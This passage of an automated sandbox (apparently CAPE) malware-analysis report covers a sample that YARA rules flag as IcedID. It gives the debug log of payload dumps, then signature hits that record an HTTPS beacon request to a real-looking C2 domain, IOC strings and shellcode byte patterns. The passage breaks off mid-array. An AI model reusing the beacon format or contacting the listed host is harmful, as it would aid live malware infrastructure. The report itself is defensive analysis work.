21:41:18,922 [root] DEBUG: 9448: hook_api: Warning - SetWindowLongW export address 0x76B95C00 differs from GetProcAddress -> 0x74275AE0 (apphelp.dll::0x35ae0)\n2025-03-07 21:41:18,922 [root] DEBUG: 9448: hook_api: Warning - EnumDisplayDevicesA export address 0x76B89D30 differs from GetProcAddress -> 0x74276880 (apphelp.dll::0x36880)\n2025-03-07 21:41:18,922 [root] DEBUG: 9448: hook_api: Warning - EnumDisplayDevicesW export address 0x76BA0340 differs from GetProcAddress -> 0x7429F2F0 (apphelp.dll::0x5f2f0)\n2025-03-07 21:41:18,922 [root] WARNING: b'Unable to place hook on GetCommandLineA'\n2025-03-07 21:41:18,922 [root] DEBUG: 9448: set_hooks: Unable to hook GetCommandLineA\n2025-03-07 21:41:18,922 [root] WARNING: b'Unable to place hook on GetCommandLineW'\n2025-03-07 21:41:18,922 [root] DEBUG: 9448: set_hooks: Unable to hook GetCommandLineW\n2025-03-07 21:41:18,975 [root] DEBUG: 9448: Hooked 611 out of 613 functions\n2025-03-07 21:41:18,975 [root] DEBUG: 9448: Syscall hook installed, syscall logging level 1\n2025-03-07 21:41:18,975 [root] DEBUG: 9448: WoW64fix: Windows version 6.2 not supported.\n2025-03-07 21:41:18,975 [root] INFO: Loaded monitor into process with pid 9448\n2025-03-07 21:41:18,975 [root] DEBUG: 9448: caller_dispatch: Added region at 0x00400000 to tracked regions list (kernel32::HeapCreate returns to 0x00414282, thread 9452).\n2025-03-07 21:41:18,975 [root] DEBUG: 9448: YaraScan: Scanning 0x00400000, size 0x81e17\n2025-03-07 21:41:18,975 [root] DEBUG: 9448: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)\n2025-03-07 21:41:18,991 [root] DEBUG: 9448: DLL loaded at 0x73D00000: C:\\Windows\\system32\\uxtheme (0x74000 bytes).\n2025-03-07 21:41:18,991 [root] DEBUG: 9448: DLL loaded at 0x76090000: C:\\Windows\\System32\\bcryptPrimitives (0x5f000 bytes).\n2025-03-07 21:41:18,991 [root] DEBUG: 9448: AllocationHandler: Adding allocation to tracked region list: 0x02280000, size: 0x1000.\n2025-03-07 21:41:18,991 [root] DEBUG: 9448: AddTrackedRegion: GetEntropy failed.\n2025-03-07 21:41:18,991 [root] DEBUG: 9448: AllocationHandler: Adding allocation to tracked region list: 0x02290000, size: 0x2000.\n2025-03-07 21:41:18,991 [root] DEBUG: 9448: AddTrackedRegion: GetEntropy failed.\n2025-03-07 21:41:18,991 [root] DEBUG: 9448: AllocationHandler: Processing previous tracked region at: 0x02280000.\n2025-03-07 21:41:18,991 [root] DEBUG: 9448: DumpPEsInRange: Scanning range 0x02280000 - 0x022807E0.\n2025-03-07 21:41:18,991 [root] DEBUG: 9448: ScanForDisguisedPE: Size too small: 0x7e0 bytes\n2025-03-07 21:41:19,006 [lib.common.results] INFO: Uploading file C:\\JqmhgbJoxD\\CAPE\\9448_301977521841207532025 to CAPE\\c2c70e2f50bba807bb47feaabbe39c15202dc663bc5448ad4a82d537f33a5711; Size is 2016; Max size: 100000000\n2025-03-07 21:41:19,022 [root] DEBUG: 9448: DumpMemory: Payload successfully created: C:\\JqmhgbJoxD\\CAPE\\9448_301977521841207532025 (size 2016 bytes)\n2025-03-07 21:41:19,022 [root] DEBUG: 9448: DumpRegion: Dumped entire allocation from 0x02280000, size 4096 bytes.\n2025-03-07 21:41:19,022 [root] DEBUG: 9448: ProcessTrackedRegion: Dumped region at 0x02280000.\n2025-03-07 21:41:19,022 [root] DEBUG: 9448: YaraScan: Scanning 0x02280000, size 0x7e0\n2025-03-07 21:41:19,022 [root] DEBUG: 9448: DLL loaded at 0x743F0000: C:\\Windows\\SYSTEM32\\CRYPTSP (0x13000 bytes).\n2025-03-07 21:41:19,022 [root] DEBUG: 9448: DLL loaded at 0x73AA0000: C:\\Windows\\system32\\rsaenh (0x2f000 bytes).\n2025-03-07 21:41:19,038 [root] DEBUG: 9448: DLL loaded at 0x74190000: C:\\Windows\\SYSTEM32\\USERENV (0x25000 bytes).\n2025-03-07 21:41:19,038 [root] DEBUG: 9448: DLL loaded at 0x74590000: C:\\Windows\\SYSTEM32\\profapi (0x18000 bytes).\n2025-03-07 21:41:19,046 [root] DEBUG: 9448: DLL loaded at 0x73AD0000: C:\\Windows\\SYSTEM32\\DPAPI (0x8000 bytes).\n2025-03-07 21:41:19,046 [root] DEBUG: 9448: DumpPEsInRange: Scanning range 0x02290000 - 0x02291F43.\n2025-03-07 21:41:19,046 [root] DEBUG: 9448: ScanForDisguisedPE: PE image located at: 0x0229053F\n2025-03-07 21:41:19,046 [root] DEBUG: 9448: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image (process 9448)\n2025-03-07 21:41:19,046 [root] DEBUG: 9448: DumpPE: Instantiating PeParser with address: 0x0229053F.\n2025-03-07 21:41:19,055 [lib.common.results] INFO: Uploading file C:\\JqmhgbJoxD\\CAPE\\9448_197202192158632025 to CAPE\\3436060c070f5e6ab9552f7a42d68e8c0cb0f08e8545237e5ba1d435103e636c; Size is 6656; Max size: 100000000\n2025-03-07 21:41:19,076 [root] DEBUG: 9448: DumpPE: PE file at 0x0229053F dumped successfully - dump size 0x1a00.\n2025-03-07 21:41:19,076 [root] DEBUG: 9448: ScanForDisguisedPE: No PE image located in range 0x0229153F-0x02291F43.\n2025-03-07 21:41:19,102 [lib.common.results] INFO: Uploading file C:\\JqmhgbJoxD\\CAPE\\9448_607012192158632025 to CAPE\\01e524a8dcee7ade63cdad414ba7d41a715284b683e01a479a37c8de91bfee9e; Size is 8003; Max size: 100000000\n2025-03-07 21:41:19,102 [root] DEBUG: 9448: DumpMemory: Payload successfully created: C:\\JqmhgbJoxD\\CAPE\\9448_607012192158632025 (size 8003 bytes)\n2025-03-07 21:41:19,102 [root] DEBUG: 9448: DumpRegion: Dumped entire allocation from 0x02290000, size 8192 bytes.\n2025-03-07 21:41:19,102 [root] DEBUG: 9448: ProcessTrackedRegion: Dumped region at 0x02290000.\n2025-03-07 21:41:19,102 [root] DEBUG: 9448: YaraScan: Scanning 0x02290000, size 0x1f43\n2025-03-07 21:41:19,102 [root] DEBUG: 9448: DLL loaded at 0x72D80000: C:\\Windows\\SYSTEM32\\WINHTTP (0xca000 bytes).\n2025-03-07 21:41:19,102 [root] DEBUG: 9448: ProtectionHandler: Adding region at 0x02431000 to tracked regions.\n2025-03-07 21:41:19,102 [root] DEBUG: 9448: ProtectionHandler: Processing previous tracked region at: 0x02290000.\n2025-03-07 21:41:19,102 [root] DEBUG: 9448: DumpPEsInRange: Scanning range 0x02430000 - 0x0243408A.\n2025-03-07 21:41:19,102 [root] DEBUG: 9448: ScanForDisguisedPE: PE image located at: 0x02430000\n2025-03-07 21:41:19,102 [root] DEBUG: 9448: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x02430000\n2025-03-07 21:41:19,118 [root] DEBUG: 9448: DumpImageInCurrentProcess: Attempting to dump virtual PE image.\n2025-03-07 21:41:19,118 [root] DEBUG: 9448: DumpProcess: Instantiating PeParser with address: 0x02430000.\n2025-03-07 21:41:19,118 [root] DEBUG: 9448: DumpProcess: Module entry point VA is 0x0000163D.\n2025-03-07 21:41:19,118 [lib.common.results] INFO: Uploading file C:\\JqmhgbJoxD\\CAPE\\9448_3684550192158632025 to CAPE\\1d35310b1dcdbab100973e739631c427753e0778179b90c1650d3aca48945d00; Size is 6656; Max size: 100000000\n2025-03-07 21:41:19,134 [root] DEBUG: 9448: DumpProcess: Module image dump success - dump size 0x1a00.\n2025-03-07 21:41:19,134 [root] DEBUG: 9448: ScanForDisguisedPE: No PE image located in range 0x02431000-0x0243408A.\n2025-03-07 21:41:19,134 [root] DEBUG: 9448: DumpRegion: Dumped PE image(s) from base address 0x02430000, size 20480 bytes.\n2025-03-07 21:41:19,134 [root] DEBUG: 9448: ProcessTrackedRegion: Dumped region at 0x02430000.\n2025-03-07 21:41:19,134 [root] DEBUG: 9448: YaraScan: Scanning 0x02430000, size 0x408a\n2025-03-07 21:41:19,134 [root] DEBUG: 9448: DLL loaded at 0x74850000: C:\\Windows\\SYSTEM32\\Wldp (0x25000 bytes).\n2025-03-07 21:41:19,134 [root] DEBUG: 9448: DLL loaded at 0x74880000: C:\\Windows\\SYSTEM32\\windows.storage (0x60d000 bytes).\n2025-03-07 21:41:19,149 [root] DEBUG: 9448: api-rate-cap: memcpy hook disabled due to rate\n2025-03-07 21:41:19,165 [root] DEBUG: 9448: InstrumentationCallback: Added region at 0x755A0000 to tracked regions list (thread 9452).\n2025-03-07 21:41:19,165 [root] DEBUG: 9448: DLL loaded at 0x73510000: C:\\Windows\\system32\\OnDemandConnRouteHelper (0x12000 bytes).\n2025-03-07 21:41:19,165 [root] DEBUG: 9448: DLL loaded at 0x739E0000: C:\\Windows\\SYSTEM32\\webio (0x73000 bytes).\n2025-03-07 21:41:19,165 [root] DEBUG: 9448: DLL loaded at 0x6DB80000: C:\\Windows\\system32\\mswsock (0x52000 bytes).\n2025-03-07 21:41:19,165 [root] DEBUG: 9448: DLL loaded at 0x738C0000: C:\\Windows\\SYSTEM32\\IPHLPAPI (0x33000 bytes).\n2025-03-07 21:41:19,165 [root] DEBUG: 9448: DLL loaded at 0x76040000: C:\\Windows\\System32\\NSI (0x7000 bytes).\n2025-03-07 21:41:19,165 [root] DEBUG: 9448: DLL loaded at 0x73900000: C:\\Windows\\SYSTEM32\\WINNSI (0x8000 bytes).\n2025-03-07 21:41:19,187 [root] DEBUG: 9448: DLL loaded at 0x73610000: C:\\Windows\\SYSTEM32\\DNSAPI (0x91000 bytes).\n2025-03-07 21:41:19,187 [root] DEBUG: 9448: DLL loaded at 0x739D0000: C:\\Windows\\System32\\rasadhlp (0x8000 bytes).\n2025-03-07 21:41:19,747 [root] DEBUG: 9448: DLL loaded at 0x73840000: C:\\Windows\\System32\\fwpuclnt (0x59000 bytes).\n2025-03-07 21:41:28,224 [root] DEBUG: 9448: DLL loaded at 0x74300000: C:\\Windows\\system32\\OnDemandConnRouteHelper (0x12000 bytes).\n2025-03-07 21:41:28,764 [root] DEBUG: 9448: DLL loaded at 0x74640000: C:\\Windows\\System32\\schannel (0x7e000 bytes).\n2025-03-07 21:41:29,636 [root] DEBUG: 9448: DLL loaded at 0x74620000: C:\\Windows\\SYSTEM32\\mskeyprotect (0x11000 bytes).\n2025-03-07 21:41:29,636 [root] DEBUG: 9448: DLL loaded at 0x743B0000: C:\\Windows\\SYSTEM32\\NTASN1 (0x28000 bytes).\n2025-03-07 21:41:29,651 [root] DEBUG: 9448: DLL loaded at 0x74380000: C:\\Windows\\SYSTEM32\\ncrypt (0x22000 bytes).\n2025-03-07 21:41:29,651 [root] DEBUG: 9448: DLL loaded at 0x74360000: C:\\Windows\\system32\\ncryptsslp (0x1f000 bytes).\n2025-03-07 21:41:29,651 [root] DEBUG: 9448: DLL loaded at 0x74320000: C:\\Windows\\SYSTEM32\\MSASN1 (0xe000 bytes).\n2025-03-07 21:41:29,683 [root] DEBUG: 9448: DLL loaded at 0x74300000: C:\\Windows\\SYSTEM32\\gpapi (0x1e000 bytes).\n2025-03-07 21:41:29,683 [root] DEBUG: 9448: api-rate-cap: NtClose hook disabled due to rate\n2025-03-07 21:41:29,683 [root] DEBUG: 9448: DLL loaded at 0x74200000: C:\\Windows\\SYSTEM32\\cryptnet (0x26000 bytes).\n2025-03-07 21:41:29,698 [root] DEBUG: 9448: DLL loaded at 0x746C0000: C:\\Windows\\SYSTEM32\\dhcpcsvc6 (0x14000 bytes).\n2025-03-07 21:41:29,698 [root] DEBUG: 9448: DLL loaded at 0x74750000: C:\\Windows\\SYSTEM32\\dhcpcsvc (0x16000 bytes).\n2025-03-07 21:41:29,714 [root] DEBUG: 9448: DLL loaded at 0x742E0000: C:\\Windows\\SYSTEM32\\Cabinet (0x20000 bytes).\n2025-03-07 21:41:30,201 [root] INFO: Added new file to list with pid None and path C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506\n2025-03-07 21:41:30,201 [root] INFO: Added new file to list with pid None and path C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506\n2025-03-07 21:41:30,201 [root] DEBUG: 9448: NtTerminateProcess hook: Attempting to dump process 9448\n2025-03-07 21:41:30,201 [root] DEBUG: 9448: DoProcessDump: Skipping process dump as code is identical on disk.\n2025-03-07 21:41:30,270 [root] INFO: Process with pid 9448 has terminated\n2025-03-07 21:41:35,900 [root] INFO: Process list is empty, terminating analysis\n2025-03-07 21:41:36,916 [root] INFO: Created shutdown mutex\n2025-03-07 21:41:37,950 [root] INFO: Shutting down package\n2025-03-07 21:41:37,950 [root] INFO: Stopping auxiliary modules\n2025-03-07 21:41:37,950 [root] INFO: Stopping auxiliary module: Browser\n2025-03-07 21:41:37,950 [root] INFO: Stopping auxiliary module: Human\n2025-03-07 21:41:38,385 [root] INFO: Stopping auxiliary module: Screenshots\n2025-03-07 21:41:38,385 [root] INFO: Finishing auxiliary modules\n2025-03-07 21:41:38,385 [root] INFO: Shutting down pipe server and dumping dropped files\n2025-03-07 21:41:38,385 [lib.common.results] INFO: Uploading file C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506 to files\\d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755; Size is 73305; Max size: 100000000\n2025-03-07 21:41:38,388 [lib.common.results] INFO: Uploading file C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506 to files\\bec78e258058e3f4eab81539d9cc2e62bb9aaeda361d0de7195aaaf32701a7b9; Size is 330; Max size: 100000000\n2025-03-07 21:41:38,406 [root] WARNING: Folder at path \"C:\\JqmhgbJoxD\\debugger\" does not exist, skipping\n2025-03-07 21:41:38,406 [root] INFO: Uploading files at path \"C:\\JqmhgbJoxD\\tlsdump\"\n2025-03-07 21:41:38,406 [lib.common.results] INFO: Uploading file C:\\JqmhgbJoxD\\tlsdump\\tlsdump.log to tlsdump\\tlsdump.log; Size is 33154; Max size: 100000000\n2025-03-07 21:41:38,406 [root] INFO: Analysis completed\n", + "errors": [] + }, + "network": {}, + "suricata": { + "alerts": [], + "tls": [], + "perf": [], + "files": [], + "http": [], + "dns": [], + "ssh": [], + "fileinfo": [], + "eve_log_full_path": null, + "alert_log_full_path": null, + "tls_log_full_path": null, + "http_log_full_path": null, + "file_log_full_path": null, + "ssh_log_full_path": null, + "dns_log_full_path": null + }, + "url_analysis": {}, + "procmemory": [], + "signatures": [ + { + "name": "dead_connect", + "description": "Attempts to connect to a dead IP:Port (3 unique times)", + "categories": [ + "network" + ], + "severity": 1, + "weight": 0, + "confidence": 100, + "references": [], + "data": [ + { + "type": "call", + "pid": 9448, + "cid": 742 + }, + { + "type": "call", + "pid": 9448, + "cid": 789 + }, + { + "type": "call", + "pid": 9448, + "cid": 2658 + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "antidebug_setunhandledexceptionfilter", + "description": "SetUnhandledExceptionFilter detected (possible anti-debug)", + "categories": [ + "anti-debug" + ], + "severity": 1, + "weight": 1, + "confidence": 40, + "references": [], + "data": [ + { + "type": "call", + "pid": 9448, + "cid": 174 + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "stealth_timeout", + "description": "Possible date expiration check, exits too soon after checking local time", + "categories": [ + "stealth" + ], + "severity": 1, + "weight": 1, + "confidence": 40, + "references": [], + "data": [ + { + "process": "0b15348fb954e0b4331e.exe, PID 9448" + }, + { + "type": "call", + "pid": 9448, + "cid": 3051 + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "encrypted_ioc", + "description": "At least one IP Address, Domain, or File Name was found in a crypto call", + "categories": [ + "encryption" + ], + "severity": 2, + "weight": 0, + "confidence": 100, + "references": [], + "data": [ + { + "type": "call", + "pid": 9448, + "cid": 229 + }, + { + "type": "call", + "pid": 9448, + "cid": 2526 + }, + { + "type": "call", + "pid": 9448, + "cid": 3030 + }, + { + "ioc": ".malware.com0" + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "network_cnc_https_generic", + "description": "Establishes an encrypted HTTPS connection", + "categories": [ + "network", + "encryption" + ], + "severity": 2, + "weight": 1, + "confidence": 100, + "references": [], + "data": [ + { + "http_request": "GET /photo.png?id=0108B4F53D30923DC90000000000FF40000005 HTTP/1.1\r\nConnection: Keep-Alive\r\nHost: kostafootball.info\r\n\r\n" + }, + { + "type": "call", + "pid": 9448, + "cid": 3041 + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "injection_rwx", + "description": "Creates RWX memory", + "categories": [ + "injection" + ], + "severity": 2, + "weight": 1, + "confidence": 50, + "references": [], + "data": [ + { + "type": "call", + "pid": 9448, + "cid": 192 + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "procmem_yara", + "description": "Yara detections observed in process dumps, payloads or dropped files", + "categories": [ + "malware" + ], + "severity": 3, + "weight": 4, + "confidence": 100, + "references": [], + "data": [ + { + "Hit": "PID 9448 triggered the Yara rule 'shellcode_peb_parsing' with data '['{ 64 A1 30 00 00 00 53 55 56 8B 40 0C 57 89 4C 24 18 8B 70 0C E9 8A 00 00 00 8B 46 30 }']'" + }, + { + "Hit": "PID 9448 triggered the Yara rule 'IcedID' with data '['{ 8D 44 24 40 50 8D 84 24 44 03 00 00 68 04 21 40 00 50 FF D5 8D 84 24 4C 01 00 00 C7 44 24 28 01 00 00 00 89 44 24 1C 8D 4C 24 1C 8D 84 24 4C 03 00 00 83 C4 0C 89 44 24 14 8B D3 B8 BB 01 00 00 66 89 44 24 18 57 }', 'id=', '.png']'" + }, + { + "Hit": "PID 9448 triggered the Yara rule 'IcedID' with data '['{ 8D 44 24 40 50 8D 84 24 44 03 00 00 68 04 21 40 00 50 FF D5 8D 84 24 4C 01 00 00 C7 44 24 28 01 00 00 00 89 44 24 1C 8D 4C 24 1C 8D 84 24 4C 03 00 00 83 C4 0C 89 44 24 14 8B D3 B8 BB 01 00 00 66 89 44 24 18 57 }', 'id=', '.png']'" + }, + { + "Hit": "PID 9448 triggered the Yara rule 'shellcode_stack_strings' with data '['{ C6 45 A0 43 C6 45 A1 72 C6 45 A2 79 C6 45 A3 70 C6 45 A4 74 C6 45 A5 41 C6 45 A6 63 C6 45 A7 71 C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 A1 72 C6 45 A2 79 C6 45 A3 70 C6 45 A4 74 C6 45 A5 41 C6 45 A6 63 C6 45 A7 71 C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 A2 79 C6 45 A3 70 C6 45 A4 74 C6 45 A5 41 C6 45 A6 63 C6 45 A7 71 C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 A3 70 C6 45 A4 74 C6 45 A5 41 C6 45 A6 63 C6 45 A7 71 C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 A4 74 C6 45 A5 41 C6 45 A6 63 C6 45 A7 71 C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 A5 41 C6 45 A6 63 C6 45 A7 71 C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 A6 63 C6 45 A7 71 C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 A7 71 C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 A8 75 C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 A9 69 C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 AA 72 C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 AB 65 C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 AC 43 C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 AD 6F C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 AE 6E C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 AF 74 C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 B0 65 C6 45 B1 78 C6 45 B2 74 C6 45 B3 41 C6 45 B4 00 }', '{ C6 45 B8 43 C6 45 B9 72 C6 45 BA 79 C6 45 BB 70 C6 45 BC 74 C6 45 BD 43 C6 45 BE 72 C6 45 BF 65 C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }', '{ C6 45 B9 72 C6 45 BA 79 C6 45 BB 70 C6 45 BC 74 C6 45 BD 43 C6 45 BE 72 C6 45 BF 65 C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }', '{ C6 45 BA 79 C6 45 BB 70 C6 45 BC 74 C6 45 BD 43 C6 45 BE 72 C6 45 BF 65 C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }', '{ C6 45 BB 70 C6 45 BC 74 C6 45 BD 43 C6 45 BE 72 C6 45 BF 65 C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }', '{ C6 45 BC 74 C6 45 BD 43 C6 45 BE 72 C6 45 BF 65 C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }', '{ C6 45 BD 43 C6 45 BE 72 C6 45 BF 65 C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }', '{ C6 45 BE 72 C6 45 BF 65 C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }', '{ C6 45 BF 65 C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }', '{ C6 45 C0 61 C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }', '{ C6 45 C1 74 C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }', '{ C6 45 C2 65 C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }', '{ C6 45 C3 48 C6 45 C4 61 C6 45 C5 73 C6 45 C6 68 C6 45 C7 00 }', '{ C6 45 D8 43 C6 45 D9 72 C6 45 DA 79 C6 45 DB 70 C6 45 DC 74 C6 45 DD 48 C6 45 DE 61 C6 45 DF 73 C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }', '{ C6 45 D9 72 C6 45 DA 79 C6 45 DB 70 C6 45 DC 74 C6 45 DD 48 C6 45 DE 61 C6 45 DF 73 C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }', '{ C6 45 DA 79 C6 45 DB 70 C6 45 DC 74 C6 45 DD 48 C6 45 DE 61 C6 45 DF 73 C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }', '{ C6 45 DB 70 C6 45 DC 74 C6 45 DD 48 C6 45 DE 61 C6 45 DF 73 C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }', '{ C6 45 DC 74 C6 45 DD 48 C6 45 DE 61 C6 45 DF 73 C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }', '{ C6 45 DD 48 C6 45 DE 61 C6 45 DF 73 C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }', '{ C6 45 DE 61 C6 45 DF 73 C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }', '{ C6 45 DF 73 C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }', '{ C6 45 E0 68 C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }', '{ C6 45 E1 44 C6 45 E2 61 C6 45 E3 74 C6 45 E4 61 C6 45 E5 00 }', '{ C6 45 C8 43 C6 45 C9 72 C6 45 CA 79 C6 45 CB 70 C6 45 CC 74 C6 45 CD 44 C6 45 CE 65 C6 45 CF 72 C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }', '{ C6 45 C9 72 C6 45 CA 79 C6 45 CB 70 C6 45 CC 74 C6 45 CD 44 C6 45 CE 65 C6 45 CF 72 C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }', '{ C6 45 CA 79 C6 45 CB 70 C6 45 CC 74 C6 45 CD 44 C6 45 CE 65 C6 45 CF 72 C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }', '{ C6 45 CB 70 C6 45 CC 74 C6 45 CD 44 C6 45 CE 65 C6 45 CF 72 C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }', '{ C6 45 CC 74 C6 45 CD 44 C6 45 CE 65 C6 45 CF 72 C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }', '{ C6 45 CD 44 C6 45 CE 65 C6 45 CF 72 C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }', '{ C6 45 CE 65 C6 45 CF 72 C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }', '{ C6 45 CF 72 C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }', '{ C6 45 D0 69 C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 }', '{ C6 45 D1 76 C6 45 D2 65 C6 45 D3 4B C6 45 D4 65 C6 45 D5 79 C6 45 D6 00 